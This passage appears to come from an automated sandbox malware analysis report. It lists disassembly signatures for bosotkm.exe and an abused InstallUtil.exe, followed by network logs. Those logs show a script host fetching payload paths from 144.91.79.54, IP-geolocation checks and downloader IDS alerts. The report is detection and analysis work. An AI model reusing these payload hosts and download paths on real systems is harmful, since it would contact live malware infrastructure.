                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_00DDDE33
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 4x nop then jmp 05E33F5Ch11_2_05E33BC8
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 4x nop then jmp 05E33F5Ch11_2_05E33BD8
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h11_2_05E3F3A0
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h11_2_05E3F398
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 4x nop then jmp 05E3ABF0h11_2_05E3AB32
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 4x nop then jmp 05E3ABF0h11_2_05E3AB38
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h11_2_05E4D2D8
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 4x nop then jmp 05E5115Fh11_2_05E510E9
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 4x nop then jmp 05E5115Fh11_2_05E510F8
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 4x nop then jmp 05E5115Fh11_2_05E51339
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 4x nop then jmp 05E5115Fh11_2_05E512A8
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 4x nop then jmp 060BABF0h18_2_060BAB38
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 4x nop then jmp 060BABF0h18_2_060BAB33
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h18_2_060BF398
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h18_2_060BF3A0
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 4x nop then jmp 060B3F5Ch18_2_060B3BC8
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 4x nop then jmp 060B3F5Ch18_2_060B3BD8
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h18_2_060CD2D8
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 4x nop then jmp 060D115Fh18_2_060D12A8
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 4x nop then jmp 060D115Fh18_2_060D1339
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 4x nop then jmp 060D115Fh18_2_060D10E9
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 4x nop then jmp 060D115Fh18_2_060D10F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 02A0FA39h21_2_02A0F778
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 02A0E61Fh21_2_02A0E431
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 02A0EFA9h21_2_02A0E431
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h21_2_02A0D7F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0577D469h21_2_0577D1C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0577FB81h21_2_0577F8D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05771011h21_2_05770D60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0577D011h21_2_0577CD68
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 057715D8h21_2_05771506
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0577BEB1h21_2_0577BC08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0577C761h21_2_0577C4B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05770751h21_2_057704A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0577F729h21_2_0577F480
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0577EA21h21_2_0577E778
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0577B1A9h21_2_0577AF00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0577BA59h21_2_0577B7B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0577D8C1h21_2_0577D618
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0577E171h21_2_0577DEC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0577CBB9h21_2_0577C910
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05770BB1h21_2_05770900
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 057715D8h21_2_057711C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 057715D8h21_2_057711B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0577C309h21_2_0577C060
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 057702F1h21_2_05770040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0577F2D1h21_2_0577F028
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0577B601h21_2_0577B358
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0577E5C9h21_2_0577E320
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0577EE79h21_2_0577EBD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0577DD19h21_2_0577DA70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066576F9h21_2_06657450
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066588EDh21_2_066585B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]21_2_06653676
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06656119h21_2_06655E70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066569C9h21_2_06656720
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066572A2h21_2_06656FF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06650741h21_2_06650498
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06657FA9h21_2_06657D00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06655869h21_2_066555C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06655CC1h21_2_06655A18
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06656571h21_2_066562C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]21_2_06653360
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06656E21h21_2_06656B78
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]21_2_06653350
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066502E9h21_2_06650040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06650B99h21_2_066508F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06657B51h21_2_066578A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066553E9h21_2_06655140
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06658401h21_2_06658158
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 013DE61Fh26_2_013DE431
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 013DEFA9h26_2_013DE431
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 013DFA39h26_2_013DF778
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h26_2_013DE005
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h26_2_013DD7F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h26_2_013DDE23
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06881011h26_2_06880D60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0688DD19h26_2_0688DA70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 068815D8h26_2_068811C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0688E171h26_2_0688DEC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0688D8C1h26_2_0688D618
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0688BA59h26_2_0688B7B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0688B1A9h26_2_0688AF00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0688EA21h26_2_0688E778
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0688F729h26_2_0688F480
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06880751h26_2_068804A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0688C761h26_2_0688C4B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0688BEB1h26_2_0688BC08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 068815D8h26_2_06881506
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0688D011h26_2_0688CD68
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0688EE79h26_2_0688EBD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0688E5C9h26_2_0688E320
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0688B601h26_2_0688B358
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0688FB81h26_2_0688F8D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0688F2D1h26_2_0688F028
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 068802F1h26_2_06880040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0688C309h26_2_0688C060
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0688D469h26_2_0688D1C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06880BB1h26_2_06880900
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0688CBB9h26_2_0688C910
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 068B88EDh26_2_068B85B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 068B6119h26_2_068B5E70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 068B72A2h26_2_068B6FF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 068B69C9h26_2_068B6720
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 068B0741h26_2_068B0498
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 068B76F9h26_2_068B7450
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 068B5869h26_2_068B55C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 068B7FA9h26_2_068B7D00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 068B6571h26_2_068B62C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 068B5CC1h26_2_068B5A18
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]26_2_068B3350
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]26_2_068B3360
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 068B6E21h26_2_068B6B78
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 068B7B51h26_2_068B78A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 068B0B99h26_2_068B08F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 068B02E9h26_2_068B0040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 068B53E9h26_2_068B5140
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 068B8401h26_2_068B8158

                  Networking

                  barindex
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 144.91.79.54 80Jump to behavior
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 11.2.bosotkm.exe.417bdd0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.doc1.exe.3c2d068.4.raw.unpack, type: UNPACKEDPE
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                  Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                  Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
                  Source: Joe Sandbox ViewASN Name: CONTABODE CONTABODE
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
                  Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49727 -> 158.101.44.242:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49761 -> 158.101.44.242:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49750 -> 158.101.44.242:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49723 -> 158.101.44.242:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49716 -> 158.101.44.242:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49746 -> 158.101.44.242:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49742 -> 158.101.44.242:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49756 -> 158.101.44.242:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49721 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49725 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49736 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49728 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49760 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49751 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49766 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49755 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49745 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49763 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49764 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49759 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49768 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49774 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49747 -> 188.114.97.3:443
                  Source: global trafficHTTP traffic detected: GET /2508/s HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-CHUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET /2508/r HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-CHUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET /2508/ThXb4tU1jp1fQQFsQkY1.txt HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-CHUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET /2508/v HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-CHUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET /2508/file HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-CHUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
